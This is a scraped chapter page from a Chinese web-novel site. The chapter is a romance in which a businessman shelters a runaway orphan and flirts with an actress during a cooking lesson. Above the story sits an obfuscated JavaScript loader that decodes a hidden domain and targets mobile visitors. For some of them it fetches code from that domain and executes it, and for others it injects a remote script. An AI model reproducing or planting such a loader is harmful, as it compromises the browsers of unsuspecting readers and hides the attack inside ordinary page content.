98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一章

第15章 在别墅调情(1 / 1)

加入书签 | 推荐本书 | 问题反馈 |

帝都的某座高档写字楼里,一间简练而宽大的办公室内,一个男人穿着笔挺的西装套装伫立在落地窗前接听电话,从头到脚,从他没有沾染一丝灰尘的西装外套到那双锃亮考究的黑色皮鞋,都散发着一种成熟稳健的气质。

电话里的人语气焦急,“周先生,今天早晨宿管阿姨清查人数的时候,发现晓风不见了!我们找遍了整个福利院也没看到她……”说着,电话那头的人的声音竟带了些哭腔。

男人的眉头尽管微蹙了一下,但言语中还是保持镇定,“好,我知道了,我马上派人去找。”

周谦几乎停掉了下午的会议,并且紧急联系了警局的人全城搜寻一个名叫晓风的七岁小女孩,但仍无所获。

晚上十点,周谦开车回到西城这边的房子,早年他在北京发展的时候,买了一套独栋别墅,现在经常到上海出差,北京这边的房子也就空着了,这段时间刚好他待在北京,也就把这套闲置的房子利用起来了。

周谦走到门口,正准备按指纹解锁,忽然听到有个稚嫩的声音在唤他,“周叔叔。”

似乎是从不远处传来的,周谦循着声音望去,果然在草坪边上发现了一个穿着单薄衣裳背着书包蹲着的七八岁模样的小女孩,不知道她蹲在那里有多久了,她移了两步位置,刚才脚踩的泥土已经深深陷进了两个坑。

“晓风?”周谦疑惑地走了过去。

看着面前这个许久未见的熟悉的人,晓风的眼眶瞬间包满了泪,瘦小的脸蛋上也流下一串串晶莹的珠子,“周叔叔……呜呜呜……”

周谦面对小孩儿很有耐心,他温柔地蹲下身来询问,“怎么来我这儿了?”

看似是关心,实则是在盘问她怎么找到他这里来的,小女孩早已熟知成年人的思维,嘟起小嘴并不想告诉他。

周谦无奈地笑了笑,只好威逼利诱一番,“好吧,你不说,我就只有叫人把你送回去了?”

“啊!我说我说,”小女孩似乎很怕被抛弃,立刻诚实道来,“我早上的时候趁给送奶工开门的阿姨不注意,悄悄溜了出去……”

“然后呢。”

“然后我就拿着零花钱去旁边的早餐店买了一碗豆浆和一根油条。”小女孩在说到“豆浆和油条”时摸了摸肚子,一副饿坏了的模样。

周谦被小女孩事无巨细的描述逗得嘴角不自觉上扬,“嗯,之后呢。”

“之后我就拿着所有的钱打车来到这儿了……”小女孩低着头一副委屈巴巴的模样很让人心疼。

看起来,她在这栋房子外等了大半天了,这是私家住宅,也难怪今天在全城搜寻的时候没有找到她。不过,周谦倒是觉得这小孩儿的记性尤其好,这栋房子他只带她来过一次,她居然连门牌号都记得清清楚楚。

周谦揉了揉晓风乱蓬蓬的头发,笑道,“连书包都背过来了,是打算在我这住几天?”

被察觉出小心思的晓风立刻作出一副又要哭的可怜状,“呜呜……周叔叔,以前每一年的这个时候你和江阿姨都要带我去玩一趟的,其他的小朋友前两天都去参加了冬令营,没人陪我去……呜呜……”

在听到“江阿姨”这三个字时,周谦本来还在微笑的嘴角有一瞬间僵住,他似乎已经很长时间没有在别人口中听到这个人的姓氏了。

但几秒钟过后,他的脸上又恢复了云淡风轻,他一只手提过晓风肩上的书包,边走边说道,“屋子外冷,先进来再说。”

小女孩儿见没有被拒之门外,眼睛立刻弯成月牙状,蹦蹦跳跳地跟在周谦身后进了屋。

经历了上次胸针的事情过后,华馨垚和她的助理团队也收敛了不少,暂时没有来找许晚霜麻烦。

目前让许晚霜感到有些棘手的大概是自己饰演的角色问题,自己饰演的女二号是一名事业出色的冷酷女厨师,以往她饰演的角色是符合她自身气质的甜美少女,在剧情画面中粉色泡泡都快溢出屏幕,如今她倒为深入研究厨师这份职业而感到苦恼。

许晚霜想到了周谦,周谦身为百胜餐饮集团的总裁,旗下也有几个餐饮品牌,最有名气的自然是“望江阁”,她想去参观一下望江阁传说中的的三层大厨房,了解一下厨师的职业日常。

“想了解厨师这份职业?”电话那头,周谦挑了挑眉。

“……对”离开了檀山,这还是她第一次拜托他事情,许晚霜竟有些怯于开口。

“来我西城区这边的房子,我想你应该能更好地体验。”周谦淡淡开口,嘴角却已经迫不及待地微微上翘。

去他家?

去他家能体验什么?这人在打什么鬼主意?

许晚霜正准备拒绝,周谦已经礼貌挂断了电话,“等会地址发给你,我还有事,先不说了。”

这人,故意的吧!

剧组放假的这天,许晚霜根据周谦给的地址,来到西城区的一栋带花园的复式别墅门口,院子门口是大片的绿茵茵的草坪,在阳光的照耀下格外好看。

周谦在门口等他,他很难得没有穿正装,他穿一件白色T恤,外面套一件灰色开衫,下面穿一条旧色的牛仔裤,整个人看起来显得有少年感又有精神。

整间屋子的装修风格是简约欧式风格,周谦带着她穿过方正的会客厅,径直来到了开放式厨房。

“开始吧。”银丝框边眼镜下露出周谦的微笑。

“嗯?从哪里开始?”许晚霜一脸懵懂。

只见周谦挽起袖子,自然地顺着水槽里哗啦流出的水洗手,接着,又用纸巾擦干指关节上的水珠,不得不承认,他的手指修长,很性感。

注意到许晚霜在看他,周谦不动声色地抬了抬眼皮,“站过来一点。”

洗了手的许晚霜又乖乖地站到他身边去。

“我们先来做一道法式料理。”

“啊?难道要做好几道吗?”许晚霜料到今天她是必须在周谦的指导下下厨的,但没想到居然要做几道菜。

“我记得《玫瑰往事》这本小说的原著里,你饰演的角色是个在法国长大的华裔,所以应该精通法餐料理才对。”周谦扶了扶镜架,一脸认真地看着她。

没想到她跟周谦说了自己正在拍的戏后,他居然立刻补读了原著小说,在一向严谨的周谦这里,她是只言片语都争不过的。

“是是是,周老师。”许晚霜说完后,不服气地嘟起嘴,没想到听见背后传来一声轻笑。

周谦给许晚霜简单cao作了一系列步骤后,就让许晚霜自己试着做。

所有的食材已经分盘摆放到餐台上,第一步是将黑虎虾去壳留尾,尤其是开背取虾线这一步对丝毫没有下厨经验的许晚霜来说难如登天,见许晚霜拿起刀准备切开虾背,但虾太滑了,菜刀偏偏也不听使唤,使了半天劲也没切对,在周谦默默的注视下,许晚霜更感觉自己做得不对,脸颊有些发烫。

正当许晚霜苦恼自己切了五分钟才切了四只虾时,一双手从她腰间穿了过来,一只手温柔地握住了她拿刀的那只手,另一只手把她的小手圈住,“像这样切……笨蛋。”

说不清是他俯在耳旁说话时温热的呼吸声,还是他的手心握着自己的手时的温暖的温度,许晚霜的耳根有些倏地发烫。

虾线取完了,不知周谦是不是忘记了自己正握着许晚霜的手,淋了橄榄油的虾十分润滑,于是在料理碗内,大手握着小手去抓匀腌制虾仁,偶尔他的指节穿过许晚霜的指缝,交叠在一起,很是暧昧,许晚霜的脸更红了。

接下来就是煎香蒜片和口蘑了,许晚霜就一只手拿木铲在平底锅内胡乱翻动,另一只手又要时刻注意调整火候开关,她忙得晕头转向,忽然那双手又从她背后伸过来,握住了她的手,那人强健有力的手掌握着她的手去翻铲、颠锅……

许晚霜不经意间往后退一步,她的背又会贴到他炽热的胸膛,或者她的腰稍微往前倾的时候,微翘的臀部又会不小心碰到他有些鼓起的裆部,被他握着的手心早已出汗,许晚霜感觉自己早已面红耳赤,浑身发热,连心也毫无奏章地怦怦跳了起来。

许晚霜撒了黑胡椒和一点欧芹碎,第一道菜终于大功告成,当她看着面前这盘秀色可餐的蒜香口蘑虾时,脸上露出欣喜的表情,“周谦,我成功了。”

周谦宠溺地笑着看她,“赶快尝一下。”

许晚霜拿起筷子夹了一只虾送入嘴里,白葡萄酒的清香味混着煎香的蒜片香味儿在嘴里瞬间化开,许晚霜的眼睛都快眯成一条线,“好吃。”

“我尝尝。”周谦说着,顺势接过许晚霜手里的筷子尝起了菜,“嗯……不错。”

周谦吃完,许晚霜又尝了一口,突然,她惊觉两个人居然共用的是一双筷子,她一时间不知道该立马擦嘴还是该换一双新筷子,紧张得连声音都有些走音,“完了……”

谁知周谦却不以为意,他的眼眸里闪过一丝几不可查的喜色,连嘴角也微微上翘。

面前的女生脸上画着淡妆,鼻头和脸颊都打了腮红,粉扑扑的,穿着一条胸口有蕾丝花边的黑色丝绒裙,但左边肩头却因为刚才做菜时太慌乱,有些微垂下来,恰巧露出她性感的锁骨,可爱的脸蛋与性感的身材集一身,真是个人间尤物。

许晚霜感觉面前男人注视自己良久,而他那双黑眸里忽然间交织出了一些其他的东西,像是荒原里突然生出了一把野火,熊熊燃烧着,有热情,也有欲望……许晚霜感觉男人的双手突然撑到她背后的厨台上,而自己胸前那团柔软与他的胸膛几乎只有咫尺般的距离。

“原著小说里……不也有间接性接吻这一情节吗……”周谦的镜片下是一双直勾勾的眼睛,他看着她,像是在打量一只猎物。

周谦的说话间呼出的气息一下又一下地拍打在许晚霜的脸颊和脖颈间,许晚霜甚至感觉自己的全身也开始没来由地燥热起来。

许晚霜深感不妙,直到对上那双欲望交织的黑眸,她猛地一把推开了他,连话都有些说不清楚,“太、太晚了,我、我先走了。”

周谦皱皱眉,低头看了眼手表,她不过才来一个小时。

但望着那个仓皇逃离的娇俏背影,周谦的嘴角莫名勾起一个满意的弧度。

许晚霜出了别墅就迅速打了一辆出租车,或许是太过于着急,她忘记戴上出门前必备的墨镜口罩,她坐在车后座,脑子里全是周谦对自己说话时的模样,她脸上的guntang没有一丁点儿消散。

许晚霜全部的注意力都在自己身上,也根本没察觉到开车的司机,他戴着一顶黑色的帽子,帽檐下是一双阴冷的眼睛,眼角旁一颗黑痣,正从车内后视镜里有意无意地往后瞟,默默监视着许晚霜一举一动。



上一章
目录
下一章
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间